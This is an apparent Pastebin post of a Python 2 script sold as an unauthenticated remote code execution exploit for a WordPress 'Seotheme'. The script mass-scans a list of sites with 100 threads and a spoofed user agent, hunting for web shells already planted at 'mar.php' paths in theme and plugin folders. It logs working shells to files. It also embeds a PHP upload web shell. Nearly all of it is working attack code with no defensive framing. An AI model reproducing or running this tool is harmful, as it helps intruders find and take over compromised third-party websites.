Advertisement
FlyFar

Wordpress Seotheme - Remote Code Execution Unauthenticated

Feb 9th, 2024
706
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.09 KB | Cybersecurity | 0 0
  1. # Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
  2. # Date: 2023-09-20
  3. # Author: Milad Karimi (Ex3ptionaL)
  4. # Category : webapps
  5. # Tested on: windows 10 , firefox
  6.  
  7. import sys , requests, re
  8. from multiprocessing.dummy import Pool
  9. from colorama import Fore
  10. from colorama import init
  11. init(autoreset=True)
  12.  
  13. fr  =   Fore.RED
  14. fc  =   Fore.CYAN
  15. fw  =   Fore.WHITE
  16. fg  =   Fore.GREEN
  17. fm  =   Fore.MAGENTA
  18.  
  19. shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""
  20. requests.urllib3.disable_warnings()
  21. headers = {'Connection': 'keep-alive',
  22.             'Cache-Control': 'max-age=0',
  23.             'Upgrade-Insecure-Requests': '1',
  24.             'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
  25.             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  26.             'Accept-Encoding': 'gzip, deflate',
  27.             'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
  28.             'referer': 'www.google.com'}
  29. try:
  30.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  31. except IndexError:
  32.     path = str(sys.argv[0]).split('\\')
  33.     exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
  34.  
  35. def URLdomain(site):
  36.     if site.startswith("http://") :
  37.         site = site.replace("http://","")
  38.     elif site.startswith("https://") :
  39.         site = site.replace("https://","")
  40.     else :
  41.         pass
  42.     pattern = re.compile('(.*)/')
  43.     while re.findall(pattern,site):
  44.         sitez = re.findall(pattern,site)
  45.         site = sitez[0]
  46.     return site
  47.  
  48.  
  49. def FourHundredThree(url):
  50.     try:
  51.         url = 'http://' + URLdomain(url)
  52.         check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
  53.         if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
  54.                 print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
  55.                 open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
  56.         else:
  57.             url = 'https://' + URLdomain(url)
  58.             check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
  59.             if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
  60.                     print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
  61.                     open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
  62.             else:
  63.                 print ' -| ' + url + ' --> {}[Failed]'.format(fr)
  64.                 url = 'http://' + URLdomain(url)
  65.         check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
  66.         if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
  67.                 print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
  68.                 open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
  69.         else:
  70.             url = 'https://' + URLdomain(url)
  71.             check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
  72.             if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
  73.                     print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
  74.                     open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
  75.             else:
  76.                 print ' -| ' + url + ' --> {}[Failed]'.format(fr)
  77.     except :
  78.         print ' -| ' + url + ' --> {}[Failed]'.format(fr)
  79.  
  80. mp = Pool(100)
  81. mp.map(FourHundredThree, target)
  82. mp.close()
  83. mp.join()
  84.  
  85. print '\n [!] {}Saved in Shells.txt'.format(fc)
  86.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement